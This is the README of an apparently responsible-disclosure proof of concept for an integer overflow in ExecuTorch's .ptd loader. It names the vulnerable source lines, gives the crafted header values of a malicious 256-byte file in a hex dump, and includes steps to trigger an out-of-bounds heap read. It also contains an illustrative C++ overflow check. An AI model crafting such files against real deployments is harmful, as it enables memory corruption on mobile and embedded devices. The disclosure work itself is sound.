Initial PoC -- ExecuTorch .ptd integer overflow (huntr filing)
f3253b3 verified
---
license: mit
tags:
- security-research
- bug-bounty
- huntr
- executorch
---
# SECURITY RESEARCH POC -- ExecuTorch `.ptd` integer overflow
This repository contains a **proof-of-concept malicious `.ptd` payload** for a responsible-disclosure bug bounty submission filed at [huntr.com](https://huntr.com) under the Model File Formats program.
**The PoC demonstrates an integer-overflow primitive** in `FlatTensorDataMap::load()`:
- `extension/flat_tensor/flat_tensor_data_map.cpp:224` -- unchecked `u64 + u64 -> size_t` truncation on attacker-controlled header fields
- `extension/flat_tensor/flat_tensor_data_map.cpp:236` -- same primitive used as the LOAD LENGTH, never bounds-checked
- Sibling code in `runtime/executor/program.cpp:104-109` uses `c10::add_overflows` correctly -- proof the project knows the right pattern and **missed copies** in the extension

PR #19057 ("Fix overflows in et", Apr 24 2026, commit ec5e8e4) hardened the `get_named_data` path of the same file but did NOT touch lines 224/236. This is a missed copy of a known fix pattern, found by static review, in a file the maintainers have recently hardened against the same bug class.
## Files
| File | Purpose |
|---|---|
| `malicious.ptd` | 256-byte byte-exact PoC. Two header fields are crafted to wrap on `u64 + u64 -> size_t`. Inspect with `xxd malicious.ptd`. |
| `craft_malicious_ptd.py` | Static crafter -- reproduces `malicious.ptd` from scratch. No ExecuTorch build needed. |
| `verify_unpatched.py` | One-command reviewer-side verifier. Fetches the live `extension/flat_tensor/flat_tensor_data_map.cpp` from `pytorch/executorch` main HEAD and confirms 7 unguarded `u64+u64` sites still present alongside 1 correctly-guarded `c10::add_overflows`. Runs in <5 seconds. |
## Verification (no ExecuTorch build required)
```bash
pip install urllib3
python verify_unpatched.py
```
Expected output (verbatim):
```
[BUG CONFIRMED] The file uses c10::add_overflows correctly elsewhere
(1 call sites) but has 7 unguarded u64+u64 additions
on attacker-controlled header fields. This is the
missed-copy of the Aug 2025 CVE-2025-30402/30404/30405
remediation pattern, in a code path that PR #19057
(Apr 24 2026) added overflow guards to OTHER parts of.
```
Inspect the malicious file:
```bash
xxd malicious.ptd | head -5
```
The output shows the header values crafted to wrap around:
```
00000000: 0000 0000 0000 0000 4648 3031 2800 0000 ........FH01(...
00000010: 4000 0000 0000 0000 00ff ffff ffff ffff @...............
00000020: ffff ffff 0000 0000 4100 0000 0100 0000 ........A.......
```
(Note: bytes shown are little-endian; `flatbuffer_size = 0xFFFF_FFFF_FFFF_FF00` and `segment_data_size = 0x0000_0001_0000_0041`.)
## Runtime PoC (ExecuTorch build required)
To trigger the OOB read at runtime:
```bash
git clone https://github.com/pytorch/executorch.git
cd executorch && ./install_executorch.sh
# Build the runtime + ASan, then point any FlatTensorDataMap::load() consumer at this file.
```
Under ASan, the load produces a clean `heap-buffer-overflow` report. Without ASan, the result depends on the data loader:
- `BufferDataLoader` -> OOB read into adjacent heap allocations
- `MmapDataLoader` -> OOB read into adjacent VMA pages

On 32-bit ARM (ExecuTorch's primary deployment target: mobile / embedded / Cortex-M), `size_t` is 32 bits wide and both header arithmetic sites overflow silently, which gives a direct heap-corruption-grade primitive.
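
The arithmetic behind the two header values, as an added example that is not code from this repository or from ExecuTorch: it decodes the bytes from the `xxd` output above and compares an unguarded `u64 + u64` sum with an overflow-checked one, for a 64-bit and a 32-bit destination type. The field offsets (0x18, 0x28) are inferred by matching the values in the note to the dump, summing these two fields is an assumption about which operands meet, and `unchecked_sum` / `checked_sum` are hypothetical helpers.

```cpp
#include <cstdint>
#include <cstdio>
#include <limits>

// First 48 bytes of malicious.ptd, transcribed from the xxd output on this page.
static const uint8_t kHeader[48] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x48, 0x30, 0x31,
    0x28, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00};

// Decode a little-endian u64 without depending on host endianness or alignment.
static uint64_t read_le64(const uint8_t* p) {
  uint64_t v = 0;
  for (int i = 7; i >= 0; --i) v = (v << 8) | p[i];
  return v;
}

// Assumption: offsets found by matching the two values in the note to the dump.
static uint64_t flatbuffer_size() { return read_le64(kHeader + 0x18); }
static uint64_t segment_data_size() { return read_le64(kHeader + 0x28); }

// Unguarded pattern: add in u64, then narrow. SizeT = uint32_t models a
// 32-bit size_t. Both the wrap and the truncation happen silently.
template <typename SizeT>
static SizeT unchecked_sum(uint64_t a, uint64_t b) {
  return static_cast<SizeT>(a + b);
}

// Guarded pattern (hypothetical helper): refuse the u64 wrap and any sum
// that does not fit the destination type before using it as a length.
template <typename SizeT>
static bool checked_sum(uint64_t a, uint64_t b, SizeT* out) {
  if (a > std::numeric_limits<uint64_t>::max() - b) return false;  // wraps
  const uint64_t sum = a + b;
  if (sum > std::numeric_limits<SizeT>::max()) return false;  // truncates
  *out = static_cast<SizeT>(sum);
  return true;
}

int main() {
  const uint64_t a = flatbuffer_size(), b = segment_data_size();
  uint64_t len = 0;
  std::printf("a=%#llx b=%#llx\n", (unsigned long long)a, (unsigned long long)b);
  std::printf("unchecked length: %#llx\n",
              (unsigned long long)unchecked_sum<uint64_t>(a, b));
  std::printf("checked accepts:  %d\n", checked_sum<uint64_t>(a, b, &len));
  return 0;
}
```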
## Affected component
- **ExecuTorch** (`pytorch/executorch`) -- current `main` HEAD, post-commit `1c9c115`. Pre-patch.
- **File**: `extension/flat_tensor/flat_tensor_data_map.cpp` lines 224 and 236.
- **Same bug class also unhardened**: `runtime/executor/pte_data_map.cpp:57-60` (out of scope for this report).
## Disclosure status
This PoC is part of a responsible-disclosure submission filed via huntr's Model File Formats bug bounty program. After triage and remediation, this repository will be marked private or deleted.
## Disclaimer
This repository is intended for security research and responsible disclosure only. Do not use the techniques shown here on systems you do not own or have permission to test.
## Contact
Security researcher: **kais113** (amakais.sales@gmail.com)